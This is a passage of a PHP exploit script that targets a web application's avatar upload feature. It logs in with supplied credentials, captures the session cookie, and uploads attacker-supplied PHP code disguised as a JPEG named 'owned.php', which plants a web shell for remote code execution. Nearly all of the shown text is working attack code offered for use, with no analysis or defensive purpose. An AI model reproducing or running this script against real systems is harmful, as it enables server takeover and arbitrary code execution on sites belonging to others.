) :\r\n"; $phpcode = trim(fgets(STDIN)); echo "\r\n[+] Connection... "; $sock = @fsockopen($argv[1], 80, $eno, $estr, 30); if (!$sock) { die("Failed\r\n\r\nCould not connect to ".$argv[1]." on the port 80 !"); } echo "OK\r\n"; echo "[+] Login to account... "; $reqlogin = "POST ".$argv[2]."index.php?shard=login&action=proc_login HTTP/1.1\r\n"; $reqlogin .= "Host: ".$argv[1]."\r\n"; $reqlogin .= "Accept: */*\r\n"; $reqlogin .= "Connection: Close\r\n"; $reqlogin .= "Content-Type: application/x-www-form-urlencoded\r\n"; $reqlogin .= "Content-Length: ".strlen("login_name=".$argv[3]."&login_pass=".$argv[4])."\r\n\r\n"; $reqlogin .= "login_name=".$argv[3]."&login_pass=".$argv[4]; fwrite($sock, $reqlogin); while(!feof($sock)) { $buffer = fgets($sock); if(preg_match("`Set-Cookie: ".$argv[5]."userID=(.*?);`", $buffer, $idtmp)) { $id = $idtmp[1]; } } if(empty($id)) { die("Failed\r\n\r\nCould not login as ".$argv[3]." !"); } else { echo "OK\r\n"; } fclose($sock); echo "[+] Sending of the file... "; $sock = @fsockopen($argv[1], 80, $eno, $estr, 30); if (!$sock) { die("Failed\r\n\r\nCould not connect to ".$argv[1]." on the port 80 !"); } $requp = "POST ".$argv[2]."index.php?shard=usercp&action=g_avatar HTTP/1.1\r\n"; $requp .= "Host: ".$argv[1]."\r\n"; $requp .= "Accept: */*\r\n"; $requp .= "Connection: Close\r\n"; $requp .= "Cookie: ".$argv[5]."username=".$argv[3]."; ".$argv[5]."userID=".$id."; ".$argv[5]."password=".sha1($argv[4])."\r\n"; $requp .= "Content-Type: multipart/form-data; boundary=--------------268742553814512\r\n"; $requp2 .= "----------------268742553814512\r\n"; $requp2 .= "Content-Disposition: form-data; name=\"upload_flag\";\r\n\r\n"; $requp2 .= "true\r\n"; $requp2 .= "----------------268742553814512\r\n"; $requp2 .= "Content-Disposition: form-data; name=\"imagefile\"; filename=\"owned.php\";\r\n"; $requp2 .= "Content-Type: image/jpeg\r\n\r\n"; $requp2 .= $phpcode."\r\n"; $requp2 .= "----------------268742553814512\r\n"; $requp2 .= "Content-Disposition: form-data; name=\"Submit\";\r\n\r\n"; $requp2 .= "Submit\r\n"; $requp2 .= "----------------268742553814512--\r\n"; $requp .= "Content-Length: ".strlen($requp2)."\r\n\r\n"; $requp .= $requp2; fwrite($sock, $requp); while(!feof($sock)) { if(preg_match("`